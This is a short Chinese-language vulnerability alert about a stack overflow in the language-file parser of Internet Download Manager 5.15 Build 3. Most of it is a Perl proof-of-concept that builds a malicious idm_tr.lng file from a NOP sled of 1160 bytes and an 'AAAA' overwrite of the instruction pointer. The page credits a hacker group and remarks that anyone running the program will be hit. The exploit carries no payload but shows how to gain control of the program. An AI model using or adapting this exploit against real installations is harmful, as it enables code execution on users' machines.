Internet下载管理器语言文件解析栈溢出漏洞漏洞预警 -电脑资料

    影响版本:Tonec Inc Internet Download Manager 5.15 Build 3测试方法：<PRE>#####################PoC#######################################Internet Download Manager v.5.15 Build 3 (4 December)#Works on Vista#HellCode Labs || TCC Group || http://tcc.hellcode.net#Bug was found by "musashi" aka karak0rsan[musashi@hellcode.net]#thanx to murderkey$file="idm_tr.lng";$lng= "lang=0x1f Türkçe";$buffer = "\x90" x 1160;$eip = "AAAA";$toolbar = "20376=";$packet=$toolbar.$buffer.$eip;open(file, '>' . $file);print file $lng;print file "\n";print file $packet;close(file);print "File has created!\n";</PRE><PRE>PS：这东西份额不大~但只要有就会中招~</PRE>